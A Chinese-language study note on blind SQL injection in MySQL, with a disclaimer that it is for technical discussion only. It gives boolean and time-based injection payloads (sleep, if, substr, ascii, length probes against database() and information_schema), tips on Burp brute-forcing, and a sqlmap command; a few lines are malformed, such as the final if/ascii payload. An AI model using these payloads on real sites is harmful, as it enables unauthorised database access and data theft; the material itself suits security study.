盲注原理基础

注意：仅用于技术讨论，切勿用于其他用途，一切后果与本人无关！！！

一、盲注介绍

        盲注=>没有回显点

        1.页面没有输出点

        盲注：

                1.布尔盲注（能判对错）

                and  database()="hjw123"        假如数据库是对的话页面有数据

                2.时间盲注（能判时间）

                and  sleep(10)  -- qwe        如果是时间盲注则页面有延迟

二、盲注需要掌握的几个函数

        substr(字符串，从哪开始截，截多长)        字符串从1开始

         length(字符串)        输出长度

三、盲注的做法

        and  length(database())>6        判断出长度

        and  substr(database(),1,1)="a"        判断出数据库名

                也可用        ascii(substr(database(),1,1))>96        判断出库名

        

         and  length((select table_name from information_schema.tables where table_schema=database()))        判断出表名长度（注意length里面是子查询记得括号）

         and  substr((select table_name from information_schema.tables where table_schema=database()),1,1) >100       判断出表名

         小技巧：

                1.Burp

                        爆破模块

                2.python脚本（sqlmap\自己写）

                        python sqlmap.py -r D:\桌面\1.txt -delay 1 --level 3 --risk 2 -datch

                若需要闭合就手动帮闭合下

        Mysql注入小技巧方法- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者

四、延时输入（时间注入）

        if(条件，成立执行，不成立执行)

        case  when  条件  then  成立执行  else  不成立执行  end        (Mysql里的三目运算)

        and  if(length(database())>12,0,sleep(4))        判断出数据库长度

        and  if(ascii((substr(database(),1,1))))        判断出数据库第一个字母的ascii值

        接下来的做法都是差不多的